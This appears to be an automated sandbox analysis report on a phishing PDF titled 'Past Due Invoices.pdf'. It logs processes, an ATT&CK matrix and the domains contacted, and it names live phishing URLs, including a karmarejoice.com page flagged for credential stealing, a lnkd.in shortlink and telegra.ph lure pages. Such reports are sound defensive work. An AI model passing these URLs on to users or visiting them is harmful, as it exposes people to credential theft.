Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation -- "https://lnkd.in/dptWHpAa
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1644,13595751543582823336,10064474918634625774,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1948 /prefetch:8
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --type=renderer /prefetch:1 "C:\Users\user\Desktop\Past Due Invoices.pdf	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation -- "https://lnkd.in/dptWHpAa	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1720,5399732039182001069,4145587776134152115,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=12571384739979517490 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=12571384739979517490 --renderer-client-id=2 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job /prefetch:1	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --field-trial-handle=1720,5399732039182001069,4145587776134152115,131072 --disable-features=VizDisplayCompositor --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --lang=en-US --gpu-preferences=KAAAAAAAAACAAwABAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --service-request-channel-token=10574597507145346706 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1720,5399732039182001069,4145587776134152115,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=17550103462985370468 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=17550103462985370468 --renderer-client-id=4 --mojo-platform-channel-handle=1796 --allow-no-sandbox-job /prefetch:1	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1720,5399732039182001069,4145587776134152115,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=1527127842774311388 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=1527127842774311388 --renderer-client-id=5 --mojo-platform-channel-handle=1764 --allow-no-sandbox-job /prefetch:1	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1644,13595751543582823336,10064474918634625774,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1948 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google\Chrome\Application\Dictionaries

Jump to behavior

Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

File created: C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons

Jump to behavior

Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

File created: C:\Users\user\AppData\Local\Temp\acrord32_sbx

Jump to behavior

Source: classification engine

Classification label: mal72.phis.winPDF@46/169@16/14

Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: AcroRd32.exe, 00000001.00000000.519046066.000000000B2E3000.00000004.00000001.00020000.00000000.sdmp, AcroRd32.exe, 00000001.00000000.491540967.000000000B2E3000.00000004.00000001.00020000.00000000.sdmp, AcroRd32.exe, 00000001.00000000.537892253.000000000B2E3000.00000004.00000001.00020000.00000000.sdmp, AcroRd32.exe, 00000001.00000000.504865833.000000000B2E3000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE IPMMessage (ID INTEGER PRIMARY KEY, Title VARCHAR(50), Content VARCH00), ExternalLink VARCHAR(60), AcceptString VARCHAR(20), RejectString VARCHAR(20), StartDate DATE, ExpiryDate DATE, LastModifiedDate DATE, Priority INTEGER, DisplayLocation INTEGER, Context INTEGER, PairID INTEGER, MinProductVersion VARCHAR(15), MaxProductVersion VARCHAR(15),;

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Automated click: Next

Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

File opened: C:\Windows\SysWOW64\Msftedit.dll

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic			Jump to behavior

Source: Past Due Invoices.pdf	Initial sample: PDF keyword /JS count = 0
Source: Past Due Invoices.pdf	Initial sample: PDF keyword /JavaScript count = 0

Source: Past Due Invoices.pdf

Initial sample: PDF keyword /EmbeddedFile count = 0

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Local\Temp\6788_754440086\LICENSE.txt

Jump to behavior

Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv

Source: AcroRd32.exe, 00000001.00000000.498483487.0000000005A00000.00000002.00000001.00040000.00000000.sdmp, AcroRd32.exe, 00000001.00000000.531766407.0000000005A00000.00000002.00000001.00040000.00000000.sdmp, AcroRd32.exe, 00000001.00000000.512792146.0000000005A00000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: AcroRd32.exe, 00000001.00000000.498483487.0000000005A00000.00000002.00000001.00040000.00000000.sdmp, AcroRd32.exe, 00000001.00000000.531766407.0000000005A00000.00000002.00000001.00040000.00000000.sdmp, AcroRd32.exe, 00000001.00000000.512792146.0000000005A00000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: AcroRd32.exe, 00000001.00000000.498483487.0000000005A00000.00000002.00000001.00040000.00000000.sdmp, AcroRd32.exe, 00000001.00000000.531766407.0000000005A00000.00000002.00000001.00040000.00000000.sdmp, AcroRd32.exe, 00000001.00000000.512792146.0000000005A00000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: AcroRd32.exe, 00000001.00000000.498483487.0000000005A00000.00000002.00000001.00040000.00000000.sdmp, AcroRd32.exe, 00000001.00000000.531766407.0000000005A00000.00000002.00000001.00040000.00000000.sdmp, AcroRd32.exe, 00000001.00000000.512792146.0000000005A00000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Spearphishing Link	3 Exploitation for Client Execution	Path Interception	2 Process Injection	3 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	2 Process Injection	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	3 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	4 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Ingress Tool Transfer	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Past Due Invoices.pdf	0%	Virustotal		Browse

Source	Detection	Scanner	Link
dancevida.com	4%	Virustotal	Browse
part-0032.t-0009.fbs1-t-msedge.net	0%	Virustotal	Browse
lnkd.in	1%	Virustotal	Browse
karmarejoice.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://karmarejoice.com/lopi/office-RD117/	100%	SlashNext	Credential Stealing type: Phishing & Social usering
https://dancevida.com/cgi-sys/suspendedpage.cgi	0%	Avira URL Cloud	safe
https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/r9	0%	Avira URL Cloud	safe
http://cipa.jp/exif/1.0/1.0/4	0%	Avira URL Cloud	safe
http://cipa.jp/exif/1.0/	0%	URL Reputation	safe
https://lnkd.in/dptWHpAay	0%	Avira URL Cloud	safe
https://dancevida.com/css/app.css	0%	Avira URL Cloud	safe
https://api.echosign.comameArraF~	0%	Avira URL Cloud	safe
https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload/	0%	Avira URL Cloud	safe
https://karmarejoice.com/lopi/office-RD117/images/bg.jpg	0%	Avira URL Cloud	safe
http://www.npes.org/pdfx/ns/id/	0%	URL Reputation	safe
http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/k	0%	Avira URL Cloud	safe
https://dns.google	0%	URL Reputation	safe
https://lnkd.in/dptWHpAa	0%	Avira URL Cloud	safe
http://ns.useplus.org/ldf/xmp/1.0/	0%	URL Reputation	safe
https://lnkd.in/dptWHpAa)	0%	Avira URL Cloud	safe
http://iptc.org/std/Iptc4xmpExt/2008-02-29/	0%	URL Reputation	safe
http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/	0%	URL Reputation	safe
https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload/l:	0%	Avira URL Cloud	safe
https://lnkd.in/dptWHpAa2	0%	Avira URL Cloud	safe
https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/#8:m	0%	Avira URL Cloud	safe
https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/k8	0%	Avira URL Cloud	safe
https://lnkd.in/d-ad9VpM	0%	Avira URL Cloud	safe
https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/g7	0%	Avira URL Cloud	safe
https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/	0%	Avira URL Cloud	safe
http://www.quicktime.com.Acrobat	0%	URL Reputation	safe
https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/883m	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
stackpath.bootstrapcdn.com	104.18.10.207	true	false		high
dancevida.com	50.87.150.0	true	false	4%, Virustotal, Browse	unknown
accounts.google.com	142.250.186.77	true	false		high
edit.telegra.ph	149.154.164.13	true	false		high
t.me	149.154.167.99	true	false		high
maxcdn.bootstrapcdn.com	104.18.10.207	true	false		high
telegra.ph	149.154.164.13	true	false		high
part-0032.t-0009.fbs1-t-msedge.net	13.107.219.60	true	false	0%, Virustotal, Browse	unknown
lnkd.in	13.107.42.14	true	false	1%, Virustotal, Browse	unknown
karmarejoice.com	103.53.43.226	true	false	0%, Virustotal, Browse	unknown
cdnjs.cloudflare.com	104.17.24.14	true	false		high
cs1227.wpc.alphacdn.net	192.229.221.185	true	false		unknown
clients.l.google.com	142.250.185.238	true	false		high
use.fontawesome.com	unknown	unknown	false		high
clients2.google.com	unknown	unknown	false		high
code.jquery.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://dancevida.com/cgi-sys/suspendedpage.cgi	false	Avira URL Cloud: safe	unknown
https://telegra.ph/images/icons.png?1	false		high
https://telegra.ph/file/9f1d012ceb04882d3fbb6.png	false		high
https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css	false		high
https://telegra.ph/css/core.min.css?46	false		high
https://dancevida.com/css/app.css	false	Avira URL Cloud: safe	unknown
https://telegra.ph/js/core.min.js?63	false		high
https://telegra.ph/css/quill.core.min.css	false		high
https://karmarejoice.com/lopi/office-RD117/images/bg.jpg	true	Avira URL Cloud: safe	unknown
https://karmarejoice.com/lopi/office-RD117/	true	SlashNext: Credential Stealing type: Phishing & Social usering	unknown
https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js	false		high
https://telegra.ph/Past-Due-Invoice-05-13	false		high
https://karmarejoice.com/lopi/office-RD117/	true	SlashNext: Credential Stealing type: Phishing & Social usering	unknown
https://telegra.ph/Past-Due-Invoice-05-13	false		high
https://lnkd.in/dptWHpAa	false	Avira URL Cloud: safe	unknown
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1	false		high
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard	false		high
https://t.me/_websync_?path=Past-Due-Invoice-05-13&hash=1c67ee9ce8dc79971f	false		high
https://telegra.ph/js/jquery.min.js	false		high
https://telegra.ph/js/quill.min.js?9	false		high
https://telegra.ph/images/favicon_2x.png?1	false		high
https://telegra.ph/favicon.ico?1	false		high
https://telegra.ph/js/load-image.all.min.js?1	false		high
https://telegra.ph/js/autosize.min.js	false		high
https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js	false		high
https://edit.telegra.ph/check	false		high
https://lnkd.in/d-ad9VpM	false	Avira URL Cloud: safe	unknown
https://telegra.ph/js/jquery.selection.min.js	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/r9	AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://cipa.jp/exif/1.0/1.0/4	AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/cleardot.gif	craw_window.js.26.dr	false		high
http://www.aiim.org/pdfa/ns/schema#	AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmp	false		high
https://easylist.to/)	LICENSE.txt.26.dr	false		high
http://cipa.jp/exif/1.0/	AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://lnkd.in/dptWHpAay	AcroRd32.exe, 00000001.00000000.535754924.000000000AD32000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sandbox.google.com/payments/v4/js/integrator.js	craw_window.js.26.dr, manifest.json1.26.dr	false		high
https://accounts.google.com/MergeSession	craw_window.js.26.dr	false		high
https://creativecommons.org/compatiblelicenses	LICENSE.txt.26.dr	false		high
https://www.google.com	e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.dr	false		high
https://github.com/easylist)	LICENSE.txt.26.dr	false		high
http://www.aiim.org/pdfa/ns/type#	AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmp	false		high
https://creativecommons.org/.	LICENSE.txt.26.dr	false		high
https://api.echosign.comameArraF~	AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://api.echosign.com	AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmp	false		high
https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload/	AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://accounts.google.com	e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.dr	false		high
http://www.npes.org/pdfx/ns/id/	AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/k	AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.aiim.org/pdfa/ns/extension/	AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmp	false		high
https://apis.google.com	e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.dr	false		high
https://www.google.com/accounts/OAuthLogin?issueuberauth=1	craw_window.js.26.dr	false		high
https://www-googleapis-staging.sandbox.google.com	craw_background.js.26.dr, craw_window.js.26.dr	false		high
https://clients2.google.com	e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.dr	false		high
http://www.aiim.org/pdfa/ns/schema#P	AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.aiim.org/pdfa/ns/property#	AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmp	false		high
https://dns.google	b5404c6c-4576-4a9f-a871-af26967eb4e2.tmp.27.dr, 219afb8a-eb1f-4550-9f5b-ca9c25c9cc68.tmp.27.dr, e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.dr	false	URL Reputation: safe	unknown
https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p	craw_background.js.26.dr, craw_window.js.26.dr	false		high
https://www.google.com/intl/en-US/chrome/blank.html	craw_background.js.26.dr	false		high
https://ogs.google.com	e472dfa4-eb37-4633-91ed-3444bd62f3e1.tmp.27.dr, d81e269f-e0b8-4ba3-883d-58840ac1e83e.tmp.27.dr	false		high
http://ns.useplus.org/ldf/xmp/1.0/	AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://lnkd.in/dptWHpAa)	AcroRd32.exe, 00000001.00000000.532130124.0000000008FA4000.00000004.00000001.00020000.00000000.sdmp, Past Due Invoices.pdf	false	Avira URL Cloud: safe	unknown
http://www.aiim.org/pdfa/ns/id/	AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmp	false		high
http://iptc.org/std/Iptc4xmpExt/2008-02-29/	AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://payments.google.com/payments/v4/js/integrator.js	craw_window.js.26.dr, manifest.json1.26.dr	false		high
http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/	AcroRd32.exe, 00000001.00000000.518793150.000000000B161000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.aiim.org/pdfe/ns/id/	AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmp	false		high
https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload/l:	AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://www.google.com/images/x2.gif	craw_window.js.26.dr	false		high
https://lnkd.in/dptWHpAa2	History Provider Cache.26.dr	false	Avira URL Cloud: safe	unknown
https://telegra.ph/Past-Due-Invoice-05-132	History Provider Cache.26.dr	false		high
https://www.google.com/images/dot2.gif	craw_window.js.26.dr	false		high
http://www.aiim.org/pdfa/ns/id/8	AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmp	false		high
https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/#8:m	AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.aiim.org/pdfa/ns/id/?	AcroRd32.exe, 00000001.00000000.537509212.000000000B257000.00000004.00000001.00020000.00000000.sdmp	false		high
https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/k8	AcroRd32.exe, 00000001.00000000.504429863.000000000B0BA000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
